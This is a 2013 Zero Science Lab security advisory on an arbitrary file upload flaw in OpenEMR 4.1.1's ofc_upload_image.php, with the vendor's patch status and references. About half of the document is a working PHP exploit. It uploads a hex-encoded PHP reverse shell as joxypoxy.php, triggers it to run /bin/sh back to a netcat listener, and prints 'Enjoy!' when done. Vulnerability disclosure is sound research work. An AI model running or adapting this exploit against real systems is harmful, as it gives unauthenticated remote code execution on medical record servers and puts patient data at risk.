OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability

2013-02-13T00:00:00
ID ZSL-2013-5126
Type zeroscience
Reporter Gjoko Krstic
Modified 2013-02-13T00:00:00

Description

Title: OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability
Advisory ID: ZSL-2013-5126
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 13.02.2013

Summary

OpenEMR is a Free and Open Source electronic health records and medical practice management application that can run on Windows, Linux, Mac OS X, and many other platforms.

Description

The vulnerability is caused due to the improper verification of uploaded files in '/library/openflashchart/php-ofc-library/ofc_upload_image.php' script thru the 'name' parameter. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script with multiple extensions.

--------------------------------------------------------------------------------

` /library/openflashchart/php-ofc-library/ofc_upload_image.php:

21: $default_path = '../tmp-upload-images/';
23: if (!file_exists($default_path)) mkdir($default_path, 0777, true);
26: $destination = $default_path . basename( $_GET[ 'name' ] );
28: echo 'Saving your image to: '. $destination;
39: $jfh = fopen($destination, 'w') or die("can't open file");
40: fwrite($jfh, $HTTP_RAW_POST_DATA);
41: fclose($jfh);
46: exit();
`
--------------------------------------------------------------------------------

Vendor

OpenEMR - <http://www.open-emr.org>

Affected Version

4.1.1

Tested On

Microsoft Windows 7 Ultimate SP1 (EN)
Fedora Linux
Apache2, PHP 5.4 MySQL 5.5

Vendor Status

[14.02.2013] Vendor releases patch 4.1.1-Patch-10 to address this issue.

PoC

openemr_shell.php

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <http://cxsecurity.com/issue/WLB-2013020094>
[2] <http://packetstormsecurity.com/files/120274>
[3] <http://www.securityfocus.com/bid/37314>
[4] <http://1337day.com/exploit/20359>
[5] <http://www.open-emr.org/wiki/index.php/OpenEMR_Patches>
[6] <http://www.exploit-db.com/exploits/24492/>
[7] <http://secunia.com/advisories/52145/>
[8] <http://www.osvdb.org/show/osvdb/90222>
[9] <http://packetstormsecurity.com/files/120403>
[10] <http://www.metasploit.com/modules/exploit/unix/webapp/openemr_upload_exec>
[11] <http://www.exploit-db.com/exploits/24529/>
[12] <http://www.rapid7.com/db/modules/exploit/unix/webapp/open_flash_chart_upload_exec/>
[13] <http://www.osvdb.org/59051>
[14] <http://www.open-emr.org/wiki/index.php/Security_Alert_Fixes>
[15] <http://www.checkpoint.com/defense/advisories/public/2013/cpai-17-jun1.html>

Changelog

[13.02.2013] - Initial release
[14.02.2013] - Added vendor status and reference [2], [3], [4] and [5]
[15.02.2013] - Added reference [6], [7] and [8]
[20.02.2013] - Added reference [9], [10] and [11]
[05.10.2014] - Added reference [12] and [13]
[08.10.2014] - Added reference [14]
[19.05.2015] - Added reference [15]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            &lt;?php

/*

OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability


Vendor: OpenEMR
Product web page: http://www.open-emr.org
Affected version: 4.1.1

Summary: OpenEMR is a Free and Open Source electronic health records and medical
practice management application that can run on Windows, Linux, Mac OS X, and many
other platforms.

Desc: The vulnerability is caused due to the improper verification of uploaded
files in '/library/openflashchart/php-ofc-library/ofc_upload_image.php' script
thru the 'name' parameter. This can be exploited to execute arbitrary PHP code
by uploading a malicious PHP script with multiple extensions.

================================================================================
/library/openflashchart/php-ofc-library/ofc_upload_image.php:
-------------------------------------------------------------

21: $default_path = '../tmp-upload-images/';
23: if (!file_exists($default_path)) mkdir($default_path, 0777, true);
26: $destination = $default_path . basename( $_GET[ 'name' ] );
28: echo 'Saving your image to: '. $destination;
39: $jfh = fopen($destination, 'w') or die("can't open file");
40: fwrite($jfh, $HTTP_RAW_POST_DATA);
41: fclose($jfh);
46: exit();

================================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Fedora Linux
           Apache2, PHP 5.4 MySQL 5.5


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5126
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php


09.02.2013

*/


error_reporting(0);
set_time_limit(0);

$go = "\033[0;92m"; $no = "\033[0;37m";
echo $no;

$host = $argv[1];

$sock = fsockopen($host, 80, $errno, $errstr, 30);

if(!$sock)
{
    echo "\n&gt; $errstr ($errno)\n";
    die();
}

function r_shell($sc)
{
    for($z = 0; $z &lt; strlen($sc); $z += 2)
    $exec .= chr(hexdec(substr($sc,$z,2)));
    return $exec;
}

print "\n+--------------------------------------------------------+";
print "\n+                                                        +";
print "\n+ OpenEMR 4.1.1 Remote Reverse Shell Exploit (pre-auth)  +";
print "\n+                                                        +";
print "\n+                   ID: ZSL-2013-5126                    +";
print "\n+                                                        +";
print "\n+          Copyleft (c) 2013, Zero Science Lab           +";
print "\n+                                                        +";
print "\n+--------------------------------------------------------+\n\n";

// PoC for Linux
// Before running this script, listen on 127.0.0.1: nc -vv -n -l -p 1234

if ($argc &lt; 2)
{
    print "\n&gt; Usage: php $argv[0] &lt;target&gt;\n\n";
    die();
}


$pl = r_shell("3c3f7068700d0a".              "7365745f74696d".              "655f6c696d6974".
              "202830293b0d0a".              "246970203d2027".              "3132372e302e30".
              "2e31273b0d0a24".              "706f7274203d20".              "313233343b0d0a".
              "246368756e6b5f".              "73697a65203d20".              "313430303b0d0a".
              "2477726974655f".              "61203d206e756c".              "6c3b2024657272".
              "6f725f61203d20".              "6e756c6c3b0d0a".              "247368656c6c20".
              "3d2027756e616d".              "65202d613b2077".              "3b2069643b202f".
                             "62696e2f736820".              "2d69273b0d0a24".
                             "6461656d6f6e20".              "3d20303b202464".
                             "65627567203d20".              "303b0d0a696620".
                             "2866756e637469".              "6f6e5f65786973".
                             "7473282770636e".              "746c5f666f726b".
                             "272929207b0d0a".              "24706964203d20".
                             "70636e746c5f66".              "6f726b28293b0d".
              "0a696620282470".              "6964203d3d202d".              "3129207b0d0a70".
              "72696e74697428".              "224552524f523a".              "2043616e277420".
              "666f726b22293b".              "20657869742831".              "293b7d0d0a6966".
              "20282470696429".              "207b6578697428".              "30293b7d0d0a69".
              "662028706f7369".              "785f7365747369".              "642829203d3d20".
              "2d3129207b0d0a".              "7072696e746974".              "28224572726f72".
              "3a2043616e2774".              "20736574736964".              "282922293b2065".
                             "7869742831293b".              "7d0d0a24646165".
                             "6d6f6e203d2031".              "3b7d20656c7365".
                             "207b0d0a707269".              "6e746974282257".
                             "41524e494e473a".              "204661696c6564".
                             "20746f20646165".              "6d6f6e6973652e".
                             "20205468697320".              "69732071756974".
                             "6520636f6d6d6f".              "6e20616e64206e".
              "6f742066617461".              "6c2e22293b7d0d".              "0a636864697228".
              "222f22293b2075".              "6d61736b283029".              "3b0d0a24736f63".
              "6b203d2066736f".              "636b6f70656e28".              "2469702c202470".
              "6f72742c202465".              "72726e6f2c2024".              "6572727374722c".
              "203330293b0d0a".              "69662028212473".              "6f636b29207b0d".
              "0a7072696e7469".              "74282224657272".              "73747220282465".
              "72726e6f292229".              "3b206578697428".              "31293b7d0d0a24".

              "64657363726970746f7273706563203d206172726179280d0a30203d3e206172726179282270".
              "697065222c20227222292c0d0a31203d3e206172726179282270697065222c20227722292c0d".
              "0a32203d3e206172726179282270697065222c2022772229293b0d0a2470726f63657373203d".
              "2070726f635f6f70656e28247368656c6c2c202464657363726970746f72737065632c202470".
              "69706573293b0d0a696620282169735f7265736f75726365282470726f636573732929207b0d".
              "0a7072696e74697428224552524f523a2043616e277420737061776e207368656c6c22293b0d".
              "0a657869742831293b7d0d0a73747265616d5f7365745f626c6f636b696e6728247069706573".
              "5b305d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b31".
              "5d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b325d2c".
              "2030293b0d0a73747265616d5f7365745f626c6f636b696e672824736f636b2c2030293b0d0a".
              "7072696e74697428225375636365737366756c6c79206f70656e656420726576657273652073".
              "68656c6c20746f202469703a24706f727422293b0d0a7768696c6520283129207b0d0a696620".
              "2866656f662824736f636b2929207b0d0a7072696e74697428224552524f523a205368656c6c".
              "20636f6e6e656374696f6e207465726d696e6174656422293b20627265616b3b7d0d0a696620".
              "2866656f66282470697065735b315d2929207b0d0a7072696e74697428224552524f523a2053".
              "68656c6c2070726f63657373207465726d696e6174656422293b20627265616b3b7d0d0a2472".
              "6561645f61203d2061727261792824736f636b2c202470697065735b315d2c20247069706573".
              "5b325d293b0d0a246e756d5f6368616e6765645f736f636b657473203d2073747265616d5f73".
              "656c6563742824726561645f612c202477726974655f612c20246572726f725f612c206e756c".
              "6c293b0d0a69662028696e5f61727261792824736f636b2c2024726561645f612929207b0d0a".
              "6966202824646562756729207072696e7469742822534f434b205245414422293b0d0a24696e".
              "707574203d2066726561642824736f636b2c20246368756e6b5f73697a65293b0d0a69662028".
              "24646562756729207072696e7469742822534f434b3a2024696e70757422293b0d0a66777269".
              "7465282470697065735b305d2c2024696e707574293b7d0d0a69662028696e5f617272617928".
              "2470697065735b315d2c2024726561645f612929207b0d0a6966202824646562756729207072".
              "696e74697428225354444f5554205245414422293b0d0a24696e707574203d20667265616428".
              "2470697065735b315d2c20246368756e6b5f73697a65293b0d0a696620282464656275672920".
              "7072696e74697428225354444f55543a2024696e70757422293b0d0a6677726974652824736f".
              "636b2c2024696e707574293b7d0d0a69662028696e5f6172726179282470697065735b325d2c".
              "2024726561645f612929207b0d0a6966202824646562756729207072696e7469742822535444".
              "455252205245414422293b0d0a24696e707574203d206672656164282470697065735b325d2c".
              "20246368756e6b5f73697a65293b0d0a6966202824646562756729207072696e746974282253".
              "54444552523a2024696e70757422293b0d0a6677726974652824736f636b2c2024696e707574".
              "293b7d7d0d0a66636c6f73652824736f636b293b0d0a66636c6f7365282470697065735b305d".
              "293b0d0a66636c6f7365282470697065735b315d293b0d0a66636c6f7365282470697065735b".
              "325d293b0d0a70726f635f636c6f7365282470726f63657373293b0d0a66756e6374696f6e20".
              "7072696e746974202824737472696e6729207b0d0a6966202821246461656d6f6e29207b2070".
              "72696e74202224737472696e675c6e223b7d7d0d0a3f3e"); //PHP Reverse Shell, PTMNKY.


echo "\n&gt; Writing reverse shell file";

$pckt  = "POST /openemr/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=joxypoxy.php HTTP/1.1\r\n";
$pckt .= "Host: {$host}\r\n";
$pckt .= "Content-Length: ".strlen($pl)."\r\n\r\n{$pl}";

fputs($sock, $pckt);

sleep (2);
print " ...."; echo $go."[OK]"; echo $no;

echo "\n&gt; Calling your listener";

$pckt  = "GET /openemr/library/openflashchart/tmp-upload-images/joxypoxy.php HTTP/1.0\r\n";
$pckt .= "Host: {$host}\r\n";
$pckt .= "Connection: Keep-Alive\r\n\r\n";

fputs($sock, $pckt);

sleep (2);
print " ........."; echo $go."[OK]"; echo $no."\n";

// interact_sh();
echo "\n&gt; Enjoy!\n\n";

?&gt;